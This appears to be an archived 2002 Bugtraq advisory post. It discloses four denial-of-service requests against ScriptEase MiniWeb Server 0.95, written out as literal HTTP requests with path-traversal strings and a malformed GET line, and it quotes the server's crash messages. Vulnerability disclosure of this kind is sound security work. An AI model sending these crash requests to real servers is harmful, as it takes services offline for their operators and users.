Four More ScriptEase MiniWeb Server v0.95 DoS Attacks

From: 'ken'@FTU
Date: 02/20/02

Date: Tue, 19 Feb 2002 23:03:37 -0500
From: "'ken'@FTU" <ken_at_ftu@yahoo.com>
To: bugtraq@securityfocus.com, bugs@securitytracker.com

The following are four more Server Denial of Service Attacks against
ScriptEase MiniWeb Server 0.95.

These attacks do not make the server point to an invalid memory address
like the previous post.

I believe the first two attacks I describe are internal server problems
due to either coding errors or incomplete coding. The second two may
just be configuration problems on my part, as this assessment was done
fairly quickly.

After we receieve "Press a key..." on the server side, the server stops
and needs to be manually restarted.

Thanks to Tamer Sahin for his earlier post.
(http://www.securityfocus.com/archive/1/257031)

Cheers,
'ken'@FTU

<--------------- BOF ------------->

Dos One.
We Send:
GET /%2e%2e/ HTTP/1.0

ScriptEase Internal Server Reply:
1512: Cannot compare variable of different dimension.
Press a key...

=======

Dos Two.
We Send:
GET /../../../../../../../../../ HTTP/1.0

ScriptEase Internal Server Reply:
1512: Cannot compare variable of different dimension.
Press a key...

=======

Dos Three.
We Send:
GET HTTP/1.0

ScriptEase Internal Server Reply:
5108: Invalid VA_LIST.
Press a key...

=======

Dos Four.
We Send:
GET ../../../../../../../../../../ HTTP/1.0

<--------------- EOF ------------->

--
"I grew convinced that truth, sincerity and integrity in dealings
between man and man were of the utmost importance to the felicity of

Relevant Pages

  • Re: Web Server Botnets and Server Farms as Attack Platforms
    ... Web Server Botnets and Server Farms as Attack ... We discuss how these attacks work using file inclusion ... vulnerabilities and PHP shells. ... place platform by platform, ...
    (Bugtraq)
  • RE: VmWare and Pen-test Learning
    ... Setup a tftp server on your client machine. ... Use John the Ripper to crack the passwords. ... (dictionary attacks, brute force, single mode). ... Download FREE whitepaper on how a managed service can help ...
    (Pen-Test)
  • Re: [Full-disclosure] Web Server Botnets and Server Farms as Attack Platforms
    ... Web Server Botnets and Server Farms as Attack ... We discuss how these attacks work using file inclusion ... vulnerabilities and PHP shells. ... place platform by platform, ...
    (Full-Disclosure)
  • Re: ARP Spoofing and Routing
    ... I would like to know how to go abt spoofing arp caches, ... >What I was trying to do was arpspoof a server so that I could intercept ... Up to 75% of cyber attacks are launched on shopping carts, forms, ... Check your website for ...
    (Pen-Test)
  • RE: Penetration test of 1 IP address
    ... You could use a whole sleth of tools on some server, ... Audit your website security with Acunetix Web Vulnerability Scanner: ... Check your website for vulnerabilities to SQL injection, ... Up to 75% of cyber attacks are launched on shopping ...
    (Pen-Test)